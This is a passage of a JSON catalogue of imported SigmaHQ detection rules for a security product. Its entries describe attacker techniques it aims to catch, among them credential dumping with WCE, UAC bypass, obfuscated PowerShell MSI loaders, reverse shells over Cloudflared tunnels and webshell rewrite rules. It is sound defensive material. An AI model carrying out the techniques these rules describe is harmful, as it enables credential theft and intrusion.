Windows Credential Editor (WCE) Execution", "description": "Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.\nIt is often used by threat actors for credential dumping and lateral movement within compromised networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-windows-credential-editor-wce-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aa7009a-28b9-4344-8c1f-159489a390df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_wce.yml" } }, { "id": "sigmahq-sigma-7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "type": "detection", "name": "Vulnerable Driver Load", "description": "Detects loading of known vulnerable drivers via their hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_drivers.yml" } }, { "id": "sigmahq-sigma-7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "type": "detection", "name": "Vim GTFOBin Abuse - Linux", "description": "Detects the use of \"vim\" and its sibling commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or breaking out of restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vim-gtfobin-abuse-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml" } }, { "id": "sigmahq-sigma-7ac407cc-0f48-4328-aede-de1d2e6fef41", "type": "detection", "name": "Standard User In High Privileged Group", "description": "Detects logins by standard users that are members of high-privileged groups such as the Administrator group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/standard-user-in-high-privileged-group.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" } }, { "id": "sigmahq-sigma-7b10f171-7f04-47c7-9fa2-5be43c76e535", "type": "detection", "name": "Visual Basic Command Line Compiler Usage", "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/visual-basic-command-line-compiler-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" } }, { "id": "sigmahq-sigma-7b14c76a-c602-4ae6-9717-eff868153fc0", "type": "detection", "name": "HackTool - NoFilter Execution", "description": "Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134", "T1134.001" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-nofilter-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b14c76a-c602-4ae6-9717-eff868153fc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hktl_nofilter.yml" } }, { "id": "sigmahq-sigma-7b434893-c57d-4f41-908d-6a17bf1ae98f", "type": "detection", "name": "Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location", "description": "Detects a network connection initiated by programs or processes running from suspicious or uncommon file system locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-from-process-located-in-potentially-suspicious-or-u.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml" } }, { "id": "sigmahq-sigma-7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "type": "detection", "name": "Hidden Local User Creation", "description": "Detects the creation of a local hidden user account which 
should not happen for event ID 4720.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_hidden_user_creation.yml" } }, { "id": "sigmahq-sigma-7b4f794b-590a-4ad4-ba18-7964a2832205", "type": "detection", "name": "Renamed Vmnat.exe Execution", "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-vmnat-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b4f794b-590a-4ad4-ba18-7964a2832205", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml" } }, { "id": "sigmahq-sigma-7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "type": "detection", "name": "Remote Access Tool - ScreenConnect 
Potential Suspicious Remote Command Execution", "description": "Detects potentially suspicious child processes launched via the ScreenConnect client service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-potential-suspicious-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml" } }, { "id": "sigmahq-sigma-7b687634-ab20-11ea-bb37-0242ac130002", "type": "detection", "name": "Windows Pcap Drivers", "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-pcap-drivers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b687634-ab20-11ea-bb37-0242ac130002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/security/win_security_pcap_drivers.yml" } }, { "id": "sigmahq-sigma-7b6a7418-3afc-11f0-aff4-000d3abf478c", "type": "detection", "name": "Obfuscated PowerShell MSI Install via WindowsInstaller COM", "description": "Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).\nThe technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting\nmalformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection\nby hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with\nhidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027.010", "T1218.007", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/obfuscated-powershell-msi-install-via-windowsinstaller-com.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b6a7418-3afc-11f0-aff4-000d3abf478c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml" } }, { "id": 
"sigmahq-sigma-7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "type": "detection", "name": "Execute Invoke-command on Remote Host", "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/execute-invoke-command-on-remote-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" } }, { "id": "sigmahq-sigma-7bbc309f-e2b1-4eb1-8369-131a367d67d3", "type": "detection", "name": "Too Many Global Admins", "description": "Identifies an event where there are too many accounts assigned the Global Administrator role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/too-many-global-admins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7bbc309f-e2b1-4eb1-8369-131a367d67d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml" } }, { "id": "sigmahq-sigma-7bd3902d-8b8b-4dd4-838a-c6862d40150d", "type": "detection", "name": "DNS HybridConnectionManager Service Bus", "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-hybridconnectionmanager-service-bus.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" } }, { "id": "sigmahq-sigma-7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "type": "detection", "name": "HackTool - LittleCorporal Generated Maldoc Injection", "description": "Detects the process injection of a LittleCorporal generated Maldoc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1055.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-littlecorporal-generated-maldoc-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml" } }, { "id": "sigmahq-sigma-7be5fb68-f9ef-476d-8b51-0256ebece19e", "type": "detection", "name": "Suspicious Execution of Hostname", "description": "Use of hostname to get information", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-hostname.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hostname_execution.yml" } }, { "id": "sigmahq-sigma-7c06ab9b-b1d2-4ba9-b06e-09491ded20d9", "type": "detection", "name": "System Restore Registry Modification via CommandLine", "description": "Detects system restore registry modification via command line, which can be used by adversaries to disable system restore on the computer.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/system-restore-registry-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c06ab9b-b1d2-4ba9-b06e-09491ded20d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_system_restore_modification.yml" } }, { "id": "sigmahq-sigma-7c0dcd3d-acf8-4f71-9570-f448b0034f94", "type": "detection", "name": "PsExec Service Child Process Execution as LOCAL SYSTEM", "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-child-process-execution-as-local-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml" } }, { "id": "sigmahq-sigma-7c3b43d8-d794-47d2-800a-d277715aa460", "type": "detection", "name": "Scheduled Cron Task/Job - MacOs", "description": 
"Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-cron-task-job-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c3b43d8-d794-47d2-800a-d277715aa460", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" } }, { "id": "sigmahq-sigma-7c797da2-9cf2-4523-ba64-33b06339f0cc", "type": "detection", "name": "AWS ElastiCache Security Group Modified or Deleted", "description": "Identifies when an ElastiCache security group has been modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-elasticache-security-group-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c797da2-9cf2-4523-ba64-33b06339f0cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-7c81fec3-1c1d-43b0-996a-46753041b1b6", "type": "detection", "name": "UAC Bypass via Event Viewer", "description": "Detects UAC bypass method using Windows event viewer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-event-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml" } }, { "id": "sigmahq-sigma-7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "type": "detection", "name": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. 
This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-iis-url-globalrules-rewrite-via-appcmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" } }, { "id": "sigmahq-sigma-7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "type": "detection", "name": "File And SubFolder Enumeration Via Dir Command", "description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-subfolder-enumeration-via-dir-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml" } }, { "id": "sigmahq-sigma-7cb02516-6d95-4ffc-8eee-162075e111ac", "type": "detection", "name": "Successful IIS Shortname Fuzzing Scan", "description": "When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol \"~\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-iis-shortname-fuzzing-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cb02516-6d95-4ffc-8eee-162075e111ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" } }, { "id": "sigmahq-sigma-7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "type": "detection", "name": "Potential Execution of Sysinternals Tools", "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-execution-of-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" } }, { "id": "sigmahq-sigma-7cce6fc8-a07f-4d84-a53e-96e1879843c9", "type": "detection", "name": "Potential Binary Impersonating Sysinternals Tools", "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection.\nThis rule looks for the execution of binaries that are named similarly to Sysinternals tools.\nAdversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-impersonating-sysinternals-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml" } }, { "id": "sigmahq-sigma-7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "type": "detection", "name": "Network Connection Initiated To Cloudflared Tunnels Domains", "description": "Detects network connections to Cloudflared tunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-cloudflared-tunnels-domains.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cd1dcdc-6edf-4896-86dc-d1f19ad64903", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_cloudflared_communication.yml" } }, { "id": "sigmahq-sigma-7cded4b3-f09e-405a-b96f-24248433ba44", "type": "detection", "name": "OpenCanary - NTP Monlist Request", "description": "Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ntp-monlist-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cded4b3-f09e-405a-b96f-24248433ba44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ntp_monlist.yml" } }, { "id": "sigmahq-sigma-7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "type": "detection", "name": "AppX Package Installation Attempts Via AppInstaller.EXE", "description": "Detects DNS queries 
made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-package-installation-attempts-via-appinstaller-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_appinstaller.yml" } }, { "id": "sigmahq-sigma-7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "type": "detection", "name": "Malicious PowerShell 